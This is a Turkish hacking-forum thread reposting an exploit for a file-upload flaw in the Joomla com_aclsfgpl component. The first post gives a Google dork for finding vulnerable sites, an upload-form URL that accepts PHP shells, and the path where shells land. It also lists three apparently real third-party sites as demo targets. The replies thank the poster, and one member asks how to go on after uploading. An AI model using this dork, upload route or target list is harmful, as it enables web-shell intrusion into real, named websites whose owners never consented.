Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla Component com_aclsfgpl File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Joomla Component com_aclsfgpl File Upload Vulnerability
01.08.2014 04:25
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability
[+] Date: 07-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form
[+] Tested on: KaliLinux
[+} Friend's blog: http://www.na3il.com



+Exploit:

You can upload file (.php/.php.jpg...)
+P.O.C:
Kod:
127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

Shell path:
copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/

Demo:
Kod:
http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form
http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form
http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form


Alinti
Hacker Peyami
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 27
Yaşam Puanı: 318 / 664
Deneyim: 56 / 100
Rep Sayısı: 62
Mesaj Sayısı: 963
Üyelik Tarihi: 18.06.2013
      
Yorum: #2
Cvp: Joomla Component com_aclsfgpl File Upload Vulnerability
01.08.2014 05:06
SAĞOL ABİ Smile

Gölgede Yaşayanlar,Güneşi Göremezler...
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,053 / 1,053
Deneyim: 14 / 100
Rep Sayısı: 1056
Mesaj Sayısı: 3021
Üyelik Tarihi: 04.05.2013
      
Yorum: #3
Cvp: Joomla Component com_aclsfgpl File Upload Vulnerability
01.08.2014 07:13
Eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
malware
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 3
Yaşam Puanı: 0 / 52
Deneyim: 9 / 100
Rep Sayısı: 0
Mesaj Sayısı: 19
Üyelik Tarihi: 09.08.2014
     
Yorum: #4
Cvp: Joomla Component com_aclsfgpl File Upload Vulnerability
17.08.2014 22:59
Biraz Daha genis anlatabilirmisin dork u aratiyom birseyler doldurup dosya sec diyo ? Dosya yi atiyom da sonra ne yapma ??
Alinti



1 Ziyaretçi